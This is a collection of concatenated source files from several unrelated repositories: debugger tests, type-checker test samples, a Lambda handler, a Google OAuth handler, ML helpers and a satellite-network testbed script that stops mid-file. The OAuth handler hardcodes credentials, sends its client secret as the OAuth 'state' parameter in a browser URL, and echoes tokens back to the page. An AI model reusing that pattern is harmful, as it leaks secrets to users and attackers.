backchannel.send(os.path.abspath(__file__))
call_me_back_dir = backchannel.receive()
sys.path.insert(0, call_me_back_dir)
import call_me_back
def call_func():
print("break here") # @bp
call_me_back.call_me_back(call_func) # @call_me_back
print("done")
dir_local = long_tmpdir.mkdir("local")
dir_remote = long_tmpdir.mkdir("remote")
path_local = dir_local / "code_to_debug.py"
path_remote = dir_remote / "code_to_debug.py"
code_to_debug.copy(path_local)
code_to_debug.copy(path_remote)
call_me_back_dir = test_data / "call_me_back"
call_me_back_py = call_me_back_dir / "call_me_back.py"
with debug.Session() as session:
session.config["pathMappings"] = [
{"localRoot": dir_local, "remoteRoot": dir_remote}
]
backchannel = session.open_backchannel()
with run(session, target(path_remote)):
# Set breakpoints using local path. This tests that local paths are
# mapped to remote paths.
session.set_breakpoints(path_local, ["bp"])
actual_path_remote = backchannel.receive()
assert some.path(actual_path_remote) == path_remote
backchannel.send(call_me_back_dir)
stop = session.wait_for_stop(
"breakpoint",
expected_frames=[
some.dap.frame(
# Mapped files should not have a sourceReference, so that the IDE
# doesn't try to fetch them instead of opening the local file.
some.dap.source(path_local, sourceReference=0),
line="bp",
),
some.dap.frame(
# Unmapped files should have a sourceReference, since there's no
# local file for the IDE to open.
some.dap.source(
call_me_back_py, sourceReference=some.int.not_equal_to(0)
),
line="callback",
),
some.dap.frame(
# Mapped files should not have a sourceReference, so that the IDE
# doesn't try to fetch them instead of opening the local file.
some.dap.source(path_local, sourceReference=0),
line="call_me_back",
),
],
)
srcref = stop.frames[1]["source"]["sourceReference"]
try:
session.request("source", {"sourceReference": 0})
except Exception as exc:
assert "Source unavailable" in str(exc)
else:
pytest.fail("sourceReference=0 should not be valid")
source = session.request("source", {"sourceReference": srcref})
assert "def call_me_back(callback):" in source["content"]
session.request_continue()
```
#### File: debugpy/tests/__init__.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
"""debugpy tests
"""
import os
import pkgutil
import py
import pytest
# Do not import anything from debugpy until assert rewriting is enabled below!
full = int(os.environ.get("DEBUGPY_TESTS_FULL", "0")) != 0
root = py.path.local(__file__) / ".."
test_data = root / "test_data"
"""A py.path.local object for the tests/test_data/ directory.
Idiomatic use is via from .. import::
from tests import test_data
f = open(str(test_data / "attach" / "attach1.py"))
"""
# This is only imported to ensure that the module is actually installed and the
# timeout setting in pytest.ini is active, since otherwise most timeline-based
# tests will hang indefinitely if they time out.
import pytest_timeout # noqa
# We want pytest to rewrite asserts (for better error messages) in the common code
# code used by the tests, and in all the test helpers. This does not affect debugpy
# inside debugged processes.
def _register_assert_rewrite(modname):
modname = str(modname)
# print("pytest.register_assert_rewrite({0!r})".format(modname))
pytest.register_assert_rewrite(modname)
_register_assert_rewrite("debugpy.common")
tests_submodules = pkgutil.iter_modules([str(root)])
for _, submodule, _ in tests_submodules:
submodule = str("{0}.{1}".format(__name__, submodule))
_register_assert_rewrite(submodule)
# Now we can import these, and pytest will rewrite asserts in them.
from debugpy.common import json, log
import debugpy.server # noqa
# Enable full logging to stderr, and make timestamps shorter to match maximum test
# run time better.
log.stderr.levels = all
log.timestamp_format = "06.3f"
log.to_file(prefix="tests")
# Enable JSON serialization for py.path.local.
def json_default(self, obj):
if isinstance(obj, py.path.local):
return obj.strpath
return self.original_default(obj)
json.JsonEncoder.original_default = json.JsonEncoder.default
json.JsonEncoder.default = json_default
``` |
{
"source": "jhutchings1/mythril",
"score": 2
} |
#### File: mythril/support/model.py
```python
from functools import lru_cache
from z3 import sat, unknown
from mythril.support.support_args import args
from mythril.laser.smt import Optimize
from mythril.laser.ethereum.time_handler import time_handler
from mythril.exceptions import UnsatError
import logging
log = logging.getLogger(__name__)
# LRU cache works great when used in powers of 2
@lru_cache(maxsize=2 ** 23)
def get_model(constraints, minimize=(), maximize=(), enforce_execution_time=True):
"""
Returns a model based on given constraints as a tuple
:param constraints: Tuple of constraints
:param minimize: Tuple of minimization conditions
:param maximize: Tuple of maximization conditions
:param enforce_execution_time: Bool variable which enforces --execution-timeout's time
:return:
"""
s = Optimize()
timeout = args.solver_timeout
if enforce_execution_time:
timeout = min(timeout, time_handler.time_remaining() - 500)
if timeout <= 0:
raise UnsatError
s.set_timeout(timeout)
for constraint in constraints:
if type(constraint) == bool and not constraint:
raise UnsatError
constraints = [constraint for constraint in constraints if type(constraint) != bool]
for constraint in constraints:
s.add(constraint)
for e in minimize:
s.minimize(e)
for e in maximize:
s.maximize(e)
result = s.check()
if result == sat:
return s.model()
elif result == unknown:
log.debug("Timeout encountered while solving expression using z3")
raise UnsatError
``` |
{
"source": "jhutchings1/pyright",
"score": 3
} |
#### File: tests/samples/callbackPrototype1.py
```python
from typing import Optional, List, Protocol
class Combiner(Protocol):
def __call__(self, *vals: bytes,
maxlen: Optional[int] = None) -> List[bytes]:
return []
def good_cb(*vals: bytes, maxlen: Optional[int] = None) -> List[bytes]:
return []
def bad_cb1(*vals: bytes, maxlen: Optional[int], maxitems: Optional[int]) -> List[bytes]:
return []
def bad_cb2(*vals: bytes) -> List[bytes]:
return []
def bad_cb3(*vals: bytes, maxlen: Optional[str]) -> List[bytes]:
return []
comb: Combiner = good_cb
# This should generate an error because maxitems is unmatched.
comb = bad_cb1
# This should generate an error because maxlen is unmatched.
comb = bad_cb2
# This should generate an error because maxlen is the wrong type.
comb = bad_cb3
```
#### File: tests/samples/dictionary1.py
```python
from typing import Dict
def wantsIntDict(a: Dict[int, int]):
pass
wantsIntDict({3: 3, 5: 5})
wantsIntDict({x: x for x in [2, 3, 4]})
# This should generate an error because
# the type is wrong.
wantsIntDict({'hello': 3, 'bye': 5})
# This should generate an error because
# the type is wrong.
wantsIntDict({'sdf': x for x in [2, 3, 4]})
```
#### File: tests/samples/function1.py
```python
from typing import Callable
#------------------------------------------------------
# Test function type matching
class FooBase:
pass
class Foo(FooBase):
pass
class Bar(Foo):
pass
def needs_function1(callback: Callable[[Foo], Foo]):
pass
def callback1():
pass
def callback2(a: Foo) -> Foo:
return Foo()
def callback3(a: Foo) -> str:
return "1"
def callback4(a: Foo, b: Foo) -> Foo:
return Foo()
def callback5(a: Foo, b: int = 3) -> Foo:
return Foo()
def callback6(*a) -> Foo:
return Foo()
def callback7(a: str) -> Foo:
return Foo()
def callback8(a: Bar) -> Foo:
return Foo()
def callback9(a: FooBase) -> Foo:
return Foo()
# This should generate an error because callback1
# takes no parameters.
needs_function1(callback1)
needs_function1(callback2)
# This should generate an error because the return
# type of callback3 doesn't match.
needs_function1(callback3)
# This should generage an error because callback4
# takes too many parameters.
needs_function1(callback4)
needs_function1(callback5)
needs_function1(callback6)
# This should fail because the parameter is the
# wrong type.
needs_function1(callback7)
# This should fail because the parameter is the
# wrong type.
needs_function1(callback8)
needs_function1(callback9)
```
#### File: tests/samples/function2.py
```python
def func1(a: int, *b: int):
pass
func1(3)
func1(3, 4)
func1(3, *[1, 2, 3])
# This should generate an error
func1(3, 'hello')
# This should generate an error
func1(3, 5, 2, 'str')
# This should generate an error
func1('hello', 3)
# This should generate an error
str_list = ['he', '2', '3']
func1(3, *str_list)
def func2(a: str, **b: int):
pass
func2('hi')
func2('hi', b=3, c=4, d=5)
str_dict = {'a': '3', 'b': '2'}
func2('hi', **str_dict)
# This should generate a type error
func2('hi', 3)
# This should generate a type error
func2('hi', b='hi')
```
#### File: tests/samples/function3.py
```python
def f0(a: int, b: int):
return 3
def f1(a: int, b: int, /):
return 3
# This should generate an error because only one
# '/' parameter is allowed.
def f2(a: int, /, b: int, /):
return 3
def f3(a: int, /, b: int):
return 3
def f4(a: int, /, b: int, *, c: int):
return 3
# This should generate an error because a '/'
# parameter shouldn't appear after '*'.
def f5(a: int, *, b: int, /, c: int):
return 3
def f6(/, a: int, *, b: int):
return 3
f0(2, 3)
f1(2, 3)
# This should generate 1 error because b
# is a position-only parameter.
f1(2, b=3)
# This should generate 2 errors because a and b
# are position-only parameters.
f1(a=2, b=3)
f2(2, 3)
# This should generate an error.
f2(a=2, b=3)
f3(2, 3)
f3(2, b=3)
# This should generate 1 error because a is a
# position-only parameter.
f3(a=2, b=3)
f4(1, 2, c=3)
f4(1, b=2, c=3)
# This should generate an error because c is a
# name-only parameter.
f4(1, 2, 3)
# This should generate an error because a is a
# positional-only parameter.
f4(a=1, b=2, c=3)
# This will generate 2 errors because of the bad
# declaration. Test to make sure we don't crash.
f5(1, b=2, c=3)
f6(1, b=2)
f6(a=1, b=2)
```
#### File: tests/samples/genericTypes6.py
```python
from typing import TypeVar
S = TypeVar('S', str, bytes)
def constrained(first: S, second: S) -> S:
return first
# This should generate an error because the two arguments
# cannot satisfy the 'str' or 'bytes' constraint.
result = constrained('a', b'abc')
T = TypeVar('T')
def unconstrained(first: T, second: T) -> T:
return first
# This shouldn't generate an error because the TypeVar matching
# logic is free to expand the type to a union of 'str' and 'bytes'.
result = unconstrained('a', b'abc')
```
#### File: tests/samples/genericTypes8.py
```python
from typing import TypeVar, Callable
T = TypeVar('T')
U = TypeVar('U')
V = TypeVar('V')
def compose2(f: Callable[[T], U], g: Callable[[U], V]) -> Callable[[T], V]:
def composition(x: T) -> V:
return g(f(x))
return composition
def add_one(x: int) -> int:
return x + 1
def make_str(x: int) -> str:
return str(x)
add_two: Callable[[int], str] = compose2(add_one, make_str)
```
#### File: tests/samples/genericTypes9.py
```python
import pathlib
import shutil
from typing import TypeVar
class Foo:
pass
class Bar(Foo):
pass
X = TypeVar("X", Foo, str)
B = TypeVar("B", bound=Foo)
def test1(x: X) -> X:
return x
def test2(x: B) -> B:
return x
# This should generate an error because test1(Bar())
# should evaluate to type Foo, not Bar.
aa1: Bar = test1(Bar())
aa2: Foo = test1(Bar())
bb1: Bar = test2(Bar())
bb2: Foo = test2(Bar())
# The call to rmtree should not generate any errors.
data_dir = pathlib.Path("/tmp")
archive_path = data_dir / "hello"
shutil.rmtree(archive_path)
```
#### File: tests/samples/operators2.py
```python
from datetime import datetime
def requires_bool(val: bool):
pass
date1 = datetime.now()
date2 = datetime.now()
date3 = datetime.now()
foo1 = date1 < date2 <= date3
requires_bool(foo1)
int1 = 3
foo2 = 2 < int1 < 5
requires_bool(foo2)
# This should generate an error because
# int and datetime cannot be compared.
foo3 = date1 < date2 < 3
```
#### File: tests/samples/overload1.py
```python
from typing import overload, Optional
from datetime import datetime, timezone, timedelta
@overload
def from_json_timestamp(ts: int) -> datetime:
...
@overload
def from_json_timestamp(ts: None) -> None:
...
def from_json_timestamp(ts: Optional[int]) -> Optional[datetime]:
return None if ts is None else (datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(milliseconds=ts))
result1: datetime = from_json_timestamp(2418049)
# This should generate an error
result2: datetime = from_json_timestamp(None)
result3: None = from_json_timestamp(None)
# This should generate an error
result4: None = from_json_timestamp(2345)
```
#### File: tests/samples/private1.py
```python
from .private2 import TestClass, _TestClass
_Test = 1
class Foo(object):
_my_var1 = 1
_my_var2 = _my_var1
def foo(self):
a = _Test
return self._my_var1
# This should generate an error
a = _TestClass()
b = TestClass()
# This should generate an error
c = b.__priv1
d = Foo()
# This should generate an error
e = d._my_var1
f = _Test
class TestSubclass(TestClass):
def blah(self):
return self._prot1
def blah2(self):
# This should generate an error
return self.__priv1
```
#### File: tests/samples/protocol1.py
```python
from typing import TypeVar, Protocol
T = TypeVar('T')
T_co = TypeVar('T_co', covariant=True)
T_contra = TypeVar('T_contra', contravariant=True)
class Box(Protocol[T_co]):
def content(self) -> T_co:
...
box: Box[float]
second_box: Box[int]
# This should not generate an error due to the covariance of 'Box'.
box = second_box
class Sender(Protocol[T_contra]):
def send(self, data: T_contra) -> int:
...
sender: Sender[float]
new_sender: Sender[int]
# This should not generate an error because 'Sender' is contravariant.
new_sender = sender
class Proto(Protocol[T]):
attr: T
class NotProto2:
attr: int
var: Proto[float]
another_var: Proto[int]
# This should generate an error because T is invariant.
var = another_var
another_var2: NotProto2
# This should generate an error because T is invariant.
var = another_var2
```
#### File: tests/samples/protocol2.py
```python
from typing import TypeVar, Protocol
T = TypeVar("T")
StrLike = TypeVar("StrLike", str, bytes)
T_contra = TypeVar("T_contra", contravariant=True)
class Writer(Protocol[T_contra]):
def write(self, data: T_contra) -> None:
...
class WriteFile:
def write(self, s: bytes) -> None:
pass
def f(writer: Writer[bytes]):
pass
def g(writer: Writer[T]):
pass
def h(writer: Writer[StrLike]):
pass
w = WriteFile()
f(w)
g(w)
h(w)
```
#### File: tests/samples/protocol3.py
```python
from typing import Protocol
class Foo1(Protocol):
@property
def batch_shape(self) -> int:
return 0
class MockFoo1:
def __init__(self, batch_shape: int):
self._batch_shape = batch_shape
@property
def batch_shape(self) -> int:
return self._batch_shape
# This should not generate an error.
d: Foo1 = MockFoo1(batch_shape=1)
class Foo2(Protocol):
@property
def batch_shape(self) -> int:
return 0
class MockFoo2:
def __init__(self, batch_shape: int):
self._batch_shape = batch_shape
@property
def batch_shape(self) -> float:
return self._batch_shape
# This should generate an error because the
# type of the batch_shape property is not compatible.
e: Foo2 = MockFoo2(batch_shape=1)
```
#### File: tests/samples/typeAlias3.py
```python
from typing import Tuple, Optional, TypeVar
T = TypeVar('T')
ValidationResult = Tuple[bool, Optional[T]]
def foo() -> ValidationResult[str]:
return False, 'valid'
``` |
{
"source": "jhutchings1/transfer-coronavirus-data-service",
"score": 2
} |
#### File: jhutchings1/transfer-coronavirus-data-service/lambda_handler.py
```python
import os
import serverless_wsgi
from main import app
import config
def web_app(event, context):
"""Lambda handler entry point for web app.
:param event: An event from an ALB
:param context: An AWS context object
:returns: An AWS ALB event
:rtype: dict
"""
return run(event, context)
def admin(event, context):
"""Lambda handler entry point for admin app.
Adds the ADMIN environment variable which enables
the user-admin flask routes.
Ensures correct user management: admin users cannot upload or download objects from S3
but do have permission to edit the cognito pool.
:param event: An event from an ALB
:param context: An AWS context object
:returns: An AWS ALB event
:rtype: dict
"""
os.environ["ADMIN"] = "true"
return run(event, context)
def run(event, context):
config.load_environment(app)
config.setup_talisman(app)
config.load_ssm_parameters(app)
return serverless_wsgi.handle_request(app, event, context)
``` |
{
"source": "JHutter/Notemaker-API",
"score": 3
} |
#### File: JHutter/Notemaker-API/oauth.py
```python
import webapp2
from google.appengine.api import urlfetch
from urllib import urlencode
import json
import logging
client = '387463041973-2j1noh0p0danoujlobm20q9378375b0n.apps.googleusercontent.com'
secret_str = '<KEY>' ## don't do this in production, guys
oauth_redir = 'https://final-project-496-400.appspot.com/oauth'
class MainPage(webapp2.RequestHandler):
def get(self):
base = 'https://accounts.google.com/o/oauth2/v2/auth?'
client_id = 'client_id='+client
redir = '&redirect_uri=' + oauth_redir
scope = '&scope=email'
response = '&response_type=code'
secret = '&state=' + secret_str
url = base + client_id + redir + scope + response + secret
jstext = '<script type="text/javascript"> document.getElementById("signinButton").addEventListener("click", function(){ window.location = encodeURI("' + url + '");}); </script>'
# write the response
self.response.headers['Content-Type'] = 'text/html'
self.response.write('<!doctype html><html lang="en"><head><meta charset="utf-8"><title>Final Project</title></head><body><p>Retrieve a token to use with final-project-496-400 API</p><button id="signinButton">Sign in with Google</button>' + jstext + '</body></html>');
class OauthHandler(webapp2.RequestHandler):
def get(self):
# source: http://webapp2.readthedocs.io/en/latest/guide/request.html
code_value = self.request.get('code')
secret_value = self.request.get('state')
self.response.headers['Content-Type'] = 'text/plain'
server_secret = secret_str
# here should be a check that the secret in the get redir'ed from google matches the secret we have on our app's server
if (secret_value != server_secret):
self.response.write('That wasn\'t a very good secret. The secrets don\'t match.')
else:
# post to google
# source: https://cloud.google.com/appengine/docs/standard/python/issue-requests
try:
# put secret, client, etc in here
form_fields = {
'code': code_value,
'client_id': client,
'client_secret': server_secret,
'redirect_uri': oauth_redir,
'grant_type': 'authorization_code',
'access_type': 'offline'}
post_data = urlencode(form_fields)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
result = urlfetch.fetch(url = 'https://www.googleapis.com/oauth2/v4/token', payload = post_data, method = urlfetch.POST, headers = headers)
# parse the stuff we got
jsonresults = json.loads(result.content)
access_token = jsonresults['access_token']
token_type = jsonresults['token_type']
expires_in = jsonresults['expires_in']
id_token = jsonresults['id_token']
self.response.write(jsonresults)
# now get stuff from google plus, with token as header
try:
# get it there
url = 'https://www.googleapis.com/plus/v1/people/me'
auth = {'Authorization': 'Bearer ' + access_token}
# check what we got back
result = urlfetch.fetch(url, headers=auth)
if result.status_code == 200:
# if the status code says we're good, process the result
usercontent = json.loads(result.content)
self.response.write('\n\n')
self.response.write(usercontent)
# if (usercontent['isPlusUser'] == True):
# name = usercontent['displayName']
# plusurl = usercontent['url']
# # display to user
# self.response.write('Hey, I know you. You\'re ' + name)
# self.response.write('\nAnd your google plus url is ' + plusurl)
# self.response.write('\n\nSecret ' + secret_value + ' used to get this information.')
# else:
# #name = usercontent
# self.response.write('You aren\'t a google plus user, so you don\'t have a url for google plus, and I don\'t have your name.')
# self.response.write('\n\nSecret ' + secret_value + ' used to get this information.')
else:
self.response.write('Error: status code ' + result.status_code)
except urlfetch.Error:
logging.exception('Caught exception fetching url')
except urlfetch.Error:
logging.exception('Caught exception fetching url')
# source: http://webapp2.readthedocs.io/en/latest/guide/routing.html
app = webapp2.WSGIApplication([
(r'/oauth', OauthHandler),
(r'/.*', MainPage)
], debug=True)
``` |
{
"source": "JHUVisionLab/multi-modal-regression",
"score": 2
} |
#### File: JHUVisionLab/multi-modal-regression/helperFunctions.py
```python
import numpy as np
import re
from scipy.spatial.distance import cdist
import torch
from torch.optim import Optimizer
__all__ = ['classes', 'eps', 'parse_name', 'rotation_matrix', 'get_gamma', 'get_accuracy']
# object categories of interest
classes = ['aeroplane', 'bicycle', 'boat', 'bottle', 'bus', 'car', 'chair', 'diningtable', 'motorbike', 'sofa', 'train', 'tvmonitor']
# numeric precision for my experiments
eps = 1e-6
# parse the name of the image to get model and pose parameters
def parse_name(image_name):
ind = [match.start() for match in re.finditer('_', image_name)]
synset_str = image_name[:ind[0]]
model_str = image_name[ind[0]+1:ind[1]]
az = float(image_name[ind[1]+2:ind[2]])
el = float(image_name[ind[2]+2:ind[3]])
ct = float(image_name[ind[3]+2:ind[4]])
d = float(image_name[ind[4]+2:])
return synset_str, model_str, az, el, ct, d
# get rotation matrix R(az, el, ct) given the three euler angles :
# azimuth az, elevation el, camera-tilt ct
def rotation_matrix(az, el, ct):
ca = np.cos(np.radians(az))
sa = np.sin(np.radians(az))
cb = np.cos(np.radians(el))
sb = np.sin(np.radians(el))
cc = np.cos(np.radians(ct))
sc = np.sin(np.radians(ct))
Ra = np.array([[ca, -sa, 0], [sa, ca, 0], [0, 0, 1]])
Rb = np.array([[1, 0, 0], [0, cb, -sb], [0, sb, cb]])
Rc = np.array([[cc, -sc, 0], [sc, cc, 0], [0, 0, 1]])
R = np.dot(np.dot(Rc, Rb), Ra)
return R
def get_gamma(kmeans_dict):
N = kmeans_dict.shape[0]
D = cdist(kmeans_dict, kmeans_dict, 'sqeuclidean')
d = np.zeros(N)
for i in range(N):
d[i] = np.amin(D[i, np.arange(N) != i])
gamma = 1/(2*np.amin(d))
return gamma
# Implements variation of SGD (optionally with momentum)
class mySGD(Optimizer):
def __init__(self, params, c, alpha1=1e-6, alpha2=1e-8, momentum=0, dampening=0, weight_decay=0, nesterov=False):
defaults = dict(alpha1=alpha1, alpha2=alpha2, momentum=momentum, dampening=dampening, weight_decay=weight_decay, nesterov=nesterov)
super(mySGD, self).__init__(params, defaults)
self.c = c
def __setstate__(self, state):
super(mySGD, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def step(self, closure=None):
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['step'] += 1
if weight_decay != 0:
d_p.add_(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.zeros_like(p.data)
buf.mul_(momentum).add_(d_p)
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(1 - dampening, d_p)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = buf
# cyclical learning rate
t = (np.fmod(state['step']-1, self.c)+1)/self.c
if t <= 0.5:
step_size = (1-2*t)*group['alpha1'] + 2*t*group['alpha2']
else:
step_size = 2*(1-t)*group['alpha2'] + (2*t-1)*group['alpha1']
p.data.add_(-step_size, d_p)
return loss
def get_accuracy(ytrue, ypred, num_classes):
# print(ytrue.shape, ypred.shape)
acc = np.zeros(num_classes)
for i in range(num_classes):
acc[i] = np.sum((ytrue == i)*(ypred == i))/np.sum(ytrue == i)
# print(acc)
return np.mean(acc)
``` |
{
"source": "jhuwyler/qpep",
"score": 2
} |
#### File: qpep/opensand-testbed/testbeds.py
```python
import subprocess
import os
from loguru import logger
import nclib
import docker
import time
import xml.etree.ElementTree as ET
from dotenv import load_dotenv
load_dotenv()
class BasicTestbed(object):
def __init__(self, host_ip="192.168.1.199", display_number=0, linux=False):
self.host_ip = host_ip
self.display_number = display_number
self.linux = linux
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"], stderr=subprocess.DEVNULL)
# The DISPLAY env variable points to an X server for showing OpenSAND UI
my_env = {**os.environ, 'DISPLAY': str(self.host_ip) + ":" + str(self.display_number)}
logger.debug("Starting Testbed Containers")
# Start the docker containers
subprocess.call(["docker-compose", "up", "-d"], env=my_env)
# Wait for the opensand container to initialize then send a command to run the simulation
logger.debug("Starting Opensand Platform")
opensand_launched = False
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
nc.send(b'status\n')
response = nc.recv()
opensand_launched = ('SAT' in str(response)) and ('GW0' in str(response)) and ('ST1' in str(response))
except nclib.errors.NetcatError:
continue
time.sleep(1) # it often takes a little while for Opensand to identify all hosts
logger.debug("Launching Opensand Simulation")
nc.send(b'start\n')
simulation_running = False
while not simulation_running:
nc.send(b'status\n')
response = str(nc.recv())
# wait for all three components (satellite, terminal and gateway) to start running
simulation_running = response.count('RUNNING') > 3
# now that the network is running, it is possible to add ip routes from user terminal through the network
logger.debug("Connecting User Terminal to Satellite Spot Beam")
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.3")
logger.success("OpeSAND Testbed Running")
def stop_testbed(self):
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"])
def connect_terminal_workstation(self):
logger.debug("Starting User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
logger.debug("Adding External Route to Docker Host for GUI Services")
workstation_container.exec_run("ip route add " + str(self.host_ip) + " via " + str(os.getenv("GUI_NETWORK_HEAD"))+".0.1 dev eth1")
logger.debug("Connecting User Workstation to Satellite Router")
workstation_container.exec_run("ip route del default")
workstation_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Client Workstation Connected to Satellite Network")
def connect_sitespeed_workstation(self):
logger.debug("Starting Sitespeed Workstation")
docker_client = docker.from_env()
sitespeed_container = docker_client.containers.get(os.getenv("SITESPEED_CONTAINER_NAME"))
sitespeed_container.exec_run("ip route del default")
sitespeed_container.exec_run("ip route add default via " + str(os.getenv("ST_NETWORK_HEAD"))+".0.4")
logger.success("Sitespeed Workstation Connected to Satellite Network")
def launch_wireshark(self):
logger.debug("Starting Wireshark on Satellite Endpoint")
docker_client = docker.from_env()
satellite_container = docker_client.containers.get(os.getenv("SAT_CONTAINER_NAME"))
satellite_container.exec_run("wireshark", detach=True)
def launch_web_browser(self):
logger.debug("Launching Web Browser on User Workstation")
docker_client = docker.from_env()
workstation_container = docker_client.containers.get(os.getenv("WS_ST_CONTAINER_NAME"))
workstation_container.exec_run("qupzilla", detach=True)
def set_downlink_attenuation(self, attenuation_value=0):
logger.debug("Setting OpenSAND Downlink Attenuation to " + str(attenuation_value))
gw_path = 'satellite/attenuation_scenario/gw0/plugins/ideal.conf'
st_path = 'satellite/attenuation_scenario/st1/plugins/ideal.conf'
gw_conf = ET.parse(gw_path)
st_conf = ET.parse(st_path)
xml_confs = [gw_conf.getroot(), st_conf.getroot()]
for conf in xml_confs:
attenuation_settings = conf.findall('ideal/ideal_attenuations/ideal_attenuation')
for setting in attenuation_settings:
if setting.attrib["link"] == "down":
setting.set("attenuation_value", str(attenuation_value))
gw_conf.write(gw_path)
st_conf.write(st_path)
logger.debug("Updated Downlink Attenuations")
def set_plr_percentage(self, plr_percentage, st_out=False, gw_out=True):
logger.debug("Configuring Packet Loss Rate")
docker_client = docker.from_env()
containers_to_mod = []
if st_out:
logger.debug("Setting PLR for ST->GW at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("ST_CONTAINER_NAME")))
if gw_out:
logger.debug("Setting PLR for GW->ST at " + str(plr_percentage))
containers_to_mod.append(docker_client.containers.get(os.getenv("GW_CONTAINER_NAME")))
for container in containers_to_mod:
response = container.exec_run('/sbin/tc qdisc change dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
if "RTNETLINK" in str(response.output):
container.exec_run('/sbin/tc qdisc add dev opensand_tun root netem loss ' + str(plr_percentage) + "%", stderr=True, stdout=True)
logger.debug("Updated PLR to " + str(plr_percentage) + "%")
def run_attenuation_scenario(self):
logger.debug("Running Attenuation Scenario")
# wait to connect to opensand
opensand_launched = False
nc = None
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
opensand_launched = True
except:
continue
logger.debug("Connected to NC Listener")
# stop running scenarios if any
nc.send(b'stop\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# opensand reports that the testbed has stopped a little before it actually has
time.sleep(1)
# load attenuation scenario
nc.send(b'scenario attenuation_scenario\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
# start new scenario
nc.send(b'start\n')
nc.recv_until(b'OK', timeout=10)
logger.debug("Scenario Restarted")
nc.recv()
# ensure that the terminal modem is still connected
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
#terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD"))+".0.3")
logger.debug("Attenuation Scenario Launched")
class LeoTestbed(BasicTestbed):
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"], stderr=subprocess.DEVNULL)
# The DISPLAY env variable points to an X server for showing OpenSAND UI
my_env = {**os.environ, 'DISPLAY': str(self.host_ip) + ":" + str(self.display_number)}
logger.debug("Starting Testbed Containers")
# Start the docker containers
subprocess.call(["docker-compose", "up", "-d"], env=my_env)
# Wait for the opensand container to initialize then send a command to run the simulation
logger.debug("Starting Opensand Platform")
opensand_launched = False
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
nc.send(b'status\n')
response = nc.recv()
opensand_launched = ('SAT' in str(response)) and ('GW0' in str(response)) and ('ST1' in str(response))
except nclib.errors.NetcatError:
continue
logger.debug("Loading Iridium Delay Simulation")
nc.send(b'scenario delay_scenario\n')
nc.recv_until(b'OK', timeout=10)
nc.recv()
time.sleep(1) # it often takes a little while for Opensand to identify all hosts
logger.debug("Launching Opensand Simulation")
nc.send(b'start\n')
simulation_running = False
while not simulation_running:
nc.send(b'status\n')
response = str(nc.recv())
# wait for all three components (satellite, terminal and gateway) to start running
simulation_running = response.count('RUNNING') > 3
# now that the network is running, it is possible to add ip routes from user terminal through the network
logger.debug("Connecting User Terminal to Satellite Spot Beam")
docker_client = docker.from_env()
terminal_container = docker_client.containers.get(os.getenv("ST_CONTAINER_NAME"))
terminal_container.exec_run("/sbin/ip route delete default")
terminal_container.exec_run("/sbin/ip route add default via " + str(os.getenv("GW_NETWORK_HEAD")) + ".0.3")
logger.success("OpeSAND Testbed Running")
class BasicPEPTestbed(object):
def __init__(self, host_ip="192.168.1.199", display_number=0, linux=False):
self.host_ip = host_ip
self.display_number = display_number
self.linux = linux
def start_testbed(self):
# First, shut down any old running testbeds
logger.debug("Shutting Down Previous Testbeds")
subprocess.call(["docker-compose", "down"], stderr=subprocess.DEVNULL)
# The DISPLAY env variable points to an X server for showing OpenSAND UI
my_env = {**os.environ, 'DISPLAY': str(self.host_ip) + ":" + str(self.display_number)}
logger.debug("Starting Testbed Containers")
# Start the docker containers
subprocess.call(["docker-compose", "up", "-d"], env=my_env)
# Wait for the opensand container to initialize then send a command to run the simulation
logger.debug("Starting Opensand Platform")
opensand_launched = False
while not opensand_launched:
try:
nc = nclib.Netcat(('localhost', int(os.getenv('SAT_PORT_NUMBER'))), verbose=False)
nc.recv_until(b'help')
nc.recv()
nc.send(b'status\n')
response = nc.recv()
opensand_launched = ('SAT' in str(response)) and ('GW0' in str(response)) and ('ST1' in str(response))
except nclib.errors.NetcatError:
continue
time.sleep(1) # it often takes a little while for Opensand to identify all hosts
logger.debug("Launching Opensand Simulation")
nc.send(b'start\n')
simulation_running = False
while not simulation_running:
nc.send(b'status\n')
response = str(nc.recv())
# wait for all three components (satellite, terminal and gateway) to start running
